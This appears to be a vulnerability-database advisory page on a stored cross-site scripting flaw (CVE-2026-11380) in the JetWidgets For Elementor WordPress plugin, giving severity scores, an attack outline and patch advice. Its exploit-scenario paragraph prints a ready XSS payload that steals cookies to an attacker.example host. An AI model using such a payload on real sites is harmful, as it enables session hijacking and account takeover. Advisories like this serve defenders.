Skip to main content

JetWidgets For Elementor CVE-2026-11380

| EUVDEUVD-2026-40909 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-01 Wordfence GHSA-xjv6-qwmr-5pf6
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
6.4 MEDIUM

Author-level credential requirement justifies PR:L; payload stored and served via web (AV:N, AC:L); scope changes to victim browsers (S:C); no availability impact observed.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 01, 2026 - 05:34 vuln.today
CVE Published
Jul 01, 2026 - 04:32 nvd
MEDIUM 6.4

DescriptionCVE.org

The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.0.21. This is due to insufficient output escaping and missing server-side validation of the Animated Box widget's animation_effect setting before it is rendered inside an HTML class attribute. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored cross-site scripting in JetWidgets For Elementor (versions up to and including 1.0.21) allows authenticated WordPress users holding author-level access or higher to plant persistent JavaScript payloads by supplying unsanitized input to the Animated Box widget's animation_effect parameter, which is written directly into an HTML class attribute without output escaping or server-side validation. Any site visitor who loads an injected page triggers the payload, enabling session hijacking, credential theft, or administrative account takeover through privilege escalation within the victim's browser context. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain WordPress author-level credentials
Delivery
Access Elementor editor on target site
Exploit
Inject JavaScript payload into Animated Box animation_effect field
Execution
Save page (payload persisted to database unescaped)
Persist
Victim or administrator visits injected page
Impact
Attacker script executes in victim browser context

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold a valid WordPress user account with at minimum author-level role on the target site; subscriber or lower roles cannot publish or edit pages and are therefore insufficient. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N scores 6.4, indicating low-complexity network exploitation requiring only low-privilege credentials (author-level WordPress role) with no attacker-side user interaction and a changed scope affecting victims' browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who holds or compromises a WordPress author account on a target site opens the Elementor editor, adds an Animated Box widget to a page, and enters a JavaScript payload such as '"><script>document.location='https://attacker.example/steal?c='+document.cookie</script> into the animation_effect field, then publishes the page. The payload is stored in the WordPress database without sanitization; any administrator or authenticated user who subsequently visits that page has the script execute in their browser, allowing the attacker to harvest session tokens and potentially create a rogue administrator account. …
Remediation Update JetWidgets For Elementor to a version newer than 1.0.21 as soon as a patched release is confirmed available in the WordPress plugin repository; the fix is present in changeset 3583305 (https://plugins.trac.wordpress.org/changeset/3583305/jetwidgets-for-elementor) but a specific tagged release version was not independently confirmed from available data - verify via the plugin's changelog before deploying. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11380 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy